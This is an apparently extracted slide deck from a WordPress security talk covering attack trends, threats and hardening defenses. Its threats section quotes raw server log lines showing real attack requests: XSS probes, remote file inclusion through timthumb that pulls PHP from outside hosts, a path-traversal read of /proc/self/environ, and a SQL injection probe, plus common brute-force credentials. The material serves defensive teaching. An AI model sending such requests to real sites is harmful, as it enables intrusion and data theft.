word press website security
TRANSCRIPT
Trends, Threats, Defenses
WordPress Website Security
04/11/2023
root@web # WHOIS PEREZBOX
Specialization: Website Security Incident Handling Log Analysis
Special Interests: Warfare Weapons Martial Arts
Tony Perez | @perezbox | @sucuri_security 2
04/11/2023
Website Security Company
Global Operations
All Website Platforms
Scan 1M Unique Domains a Month
Block 1M web attacks a Month
300 – 500 websites a day
Signature / Heuristic Based
24/5 - 18/2 operations
Tony Perez | @perezbox | @sucuri_security 3
04/11/2023
Today’s Discussion
Trends Threats Defenses
Tony Perez | @perezbox | @sucuri_security 4
SIMPLE RIGHT?
04/11/2023
Trends
Tony Perez | @perezbox | @sucuri_security 5
04/11/2023
Explosion in Web Malicious Links
Tony Perez | @perezbox | @sucuri_security 6
Malicious Links
20112012
600%
04/11/2023
Malicious Links?
Tony Perez | @perezbox | @sucuri_security 7
Malicious
Links
Social Media
Email Links Website
Text Messag
es
04/11/2023
The Web Is The Source
Known MalwareUnkown Malware
Tony Perez | @perezbox | @sucuri_security 8
90%
04/11/2023
What’s a Good Host?
Not InfectedInfected
Tony Perez | @perezbox | @sucuri_security 9
85%
04/11/2023
Malware Type Distribution
Remot
e iF
ram
e In
cludes
Remot
e Ja
vaScr
ipt In
cludes
SPAM In
ject
ions
Obfu
scat
ed /
Enco
ded Ja
vaScr
ipt
Condit
ional
Red
irec
ts
Def
acem
ents
Oth
er
26%
19%16%
14%11%
4%
10%
Tony Perez | @perezbox | @sucuri_security 10
9 Million Unique Domains Scanned
-19 % Infected
04/11/2023
Targeting Environments
Tony Perez | @perezbox | @sucuri_security 11
Apache
SSH Email Server
Going Deeper than the application layer, targeting the server.
Server Polymorphism – a.k.a changes a lot
04/11/2023
Exploiting Forms
Stick With Reputable Sources
Gravity Forms
JetPack Forms
Generating SPAM emails, resource hogs
IP blacklisting
Leverage CaptchasTony Perez | @perezbox | @sucuri_security 12
04/11/2023
Spear Phishing / Phishing Increase
Tony Perez | @perezbox | @sucuri_security 13
55% of Companies have fallen victim
04/11/2023
Search Engine Poisoning (SEP)
Pharmacy Payday Loans
Tony Perez | @perezbox | @sucuri_security 14
04/11/2023
Automated Attacks
WP-Admin
Editor / Widgets / Posts
Payload
Tony Perez | @perezbox | @sucuri_security 15
Access – so easy, yet so weak
04/11/2023
Brute Force Attacks
Tony Perez | @perezbox | @sucuri_security 16
04/11/2023
April Brute Force Attacks
Tony Perez | @perezbox | @sucuri_security 17
04/11/2023
Cross-Site Contamination
Tony Perez | @perezbox | @sucuri_security 18
Site 1
Site 2Site 3
Site 4WordPress 2.8
WordPress 3.5.1
WordPress 3.4.2
WordPress 3.0
04/11/2023
iFrame Injections
Tony Perez | @perezbox | @sucuri_security 19
04/11/2023
Drive By Downloads
Tony Perez | @perezbox | @sucuri_security 20
04/11/2023
Targeting Java Zero Days
Tony Perez | @perezbox | @sucuri_security 21
04/11/2023
Targeting Mobile Devices
Tony Perez | @perezbox | @sucuri_security 22
04/11/2023
Google is On Fire
Tony Perez | @perezbox | @sucuri_security 23
04/11/2023
Exploiting Trust
Tony Perez | @perezbox | @sucuri_security 24
04/11/2023
Latest Plugin Issues
W3TC & WP Super Cache Remote Command Execution (RCE)
Vulnerability
WPMM SPAM Injections (Bad Plugin)
Social Media Widget SPAM Injections (Core Commit)
Tony Perez | @perezbox | @sucuri_security 25
04/11/2023
There’s a Tool for that
Explosion in the Malware as a Service (MaaS) trade Yes, pay someone to hack
for you
Different tools to break in and generate payloads Brute force and
vulnerability exploits Malware Payloads
Blackhole Exploit Kit – Today’s market leader 2013 – SophoLabs
Tony Perez | @perezbox | @sucuri_security 26
04/11/2023
Don’t Worry, Everyone is a Target
Tony Perez | @perezbox | @sucuri_security 27
04/11/2023 Tony Perez | @perezbox | @sucuri_security 28
04/11/2023
Threats
Tony Perez | @perezbox | @sucuri_security 29
04/11/2023
Anatomy of Web Attacks
Recon Identify Attack Sustai
n
Tony Perez | @perezbox | @sucuri_security 30
Use for malware? Burrow into network? Steal data?
What kind of website do you have?
04/11/2023
Cross-Site Scripting (XSS)
Tony Perez | @perezbox | @sucuri_security 31
38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268
Stored Reflective
04/11/2023
[02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0”
83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6”
82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
Remote / Local File Inclusion (RFI)
Tony Perez | @perezbox | @sucuri_security 32
04/11/2023
SQL Injection
Tony Perez | @perezbox | @sucuri_security 33
62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
04/11/2023
Spear Phishing
Tony Perez | @perezbox | @sucuri_security 34
04/11/2023
Backdoors
Tony Perez | @perezbox | @sucuri_security 35
04/11/2023
What’s all this mean?
Brand Reputation Legal Implications Impact to Sales Blacklisted by
Search Engines Blacklisted by
Payment processors Worst Day Of your
Life
Tony Perez | @perezbox | @sucuri_security 36
04/11/2023
Defenses
Tony Perez | @perezbox | @sucuri_security 37
04/11/2023
Areas to Focus On
Access Control Vulnerabilities Hosting Online Habits Social Media Passwords
Tony Perez | @perezbox | @sucuri_security 38
04/11/2023
Manage our own expectations
“It’s about risk reduction… risk will never be zero…”
Tony Perez | @perezbox | @sucuri_security 39
04/11/2023
The Foundation
We run on WordPress Current Version of course
Sucuri properties suffer: ~125,000 web based
attacks a month on average
~4,000 attacks a day▪ This spikes on occasion
Doesn’t include server level attacks
All flavors of attacks
Tony Perez | @perezbox | @sucuri_security 40
04/11/2023
Defense in Depth Approach Instead of telling you what you need to do,
I’ll just tell you what we do;
Our philosophy and approach is very simple, complex things break in complex ways;
We focus on the areas that we can immediately control;
We believe in layered defenses;Tony Perez | @perezbox | @sucuri_security 41
04/11/2023
What we do…for websites
Tony Perez | @perezbox | @sucuri_security 42
Stay Current
IP Whitelisting
Two Factor Authentication
Strong / Unique Password
Web Application Firewall
04/11/2023
What we do…for Servers
Tony Perez | @perezbox | @sucuri_security 43
IP Whitelisting
Server Isolation
Public Key Authentication
Host Intrusion Detection System (HIDS)
Log Everything
04/11/2023
My Personal Configurations.. Tools..
Category Tool Type
Prevention – Software Vulnerabilities Sucuri CloudProxy Service
Prevention – Access Control Sucuri CloudProxy Service
Detection Sucuri Monitoring Service
Remediation Sucuri Service
Password Management 1Password / LastPass Application
Host-based Intrusion Detection System
OSSEC Application
Access Control Enforcement Login Secure Solutions
Plugin
Two-Factor Authentication Google Authenticator Plugin
Application Auditing Sucuri Premium Plugin
Backups BackupBuddy Plugin
Tony Perez | @perezbox | @sucuri_security 44
04/11/2023
My Personal Configurations… cntd..
Tony Perez | @perezbox | @sucuri_security 45
Category Location Type
Disable Theme / Plugin Editor
wp-config.php Preventive measure
Disable PHP execution .htacces – uploads / images / wp-includes / etc..
Preventive measure
Permissions Directories 755 / Files 644
Preventive measure
04/11/2023
Hosting
Tony Perez | @perezbox | @sucuri_security 46
• Don’t know what you’re doing?• Go with a managed host…
04/11/2023
Managed Hosting Options
Tony Perez | @perezbox | @sucuri_security 47
Doesn’t mean you won’t ever get infected.
04/11/2023
Passwords
Complex . Long . Unique . Esoteric
“CLUE”
Tony Perez | @perezbox | @sucuri_security 48
652,911 [log] => admin10173 [log] => test8992 [log] => administrator8921 [log] => Admin2495 [log] => root
16,798 [pwd] => admin10,880 [pwd] => 1234569,727 [pwd] => 6666669,106 [pwd] => 1111117,882 [pwd] => 123456787,717 [pwd] => qwerty7,295 [pwd] => 1234567
USERNAMES PASSWORDSEpic Fail
04/11/2023
Notable Plugins
Access Login Secure Solution Stealth Login Limit Login
Scanning WordFence Anti-Malwatch
Defense in Depth Better WP Security BulletProof Security
Vulnerabilities MVIS Security Center
Tony Perez | @perezbox | @sucuri_security 49
04/11/2023
Notable Resources
Tony Perez | @perezbox | @sucuri_security 50
Name Tool
Sucuri Blog http://blog.sucuri.net
Sucuri TV http://sucuri.tv
WordPress Forum – Hacked http://wordpress.org/tags/hacked
WordPress Forum – Malware http://wordpress.org/tags/malware
Badware Busters https://badwarebusters.org
Perishable Press http://perishablepress.com/category/web-design/security/
Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites
WordPress.org Hardening http://codex.wordpress.org/Hardening_WordPress
Google Webmaster Tools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633
Secunia Security Advisories http://secunia.com/community/advisories/search/?search=wordpress
Exploit-DB http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31
04/11/2023
Thanks
Tony Perez | @perezbox | @sucuri_security 51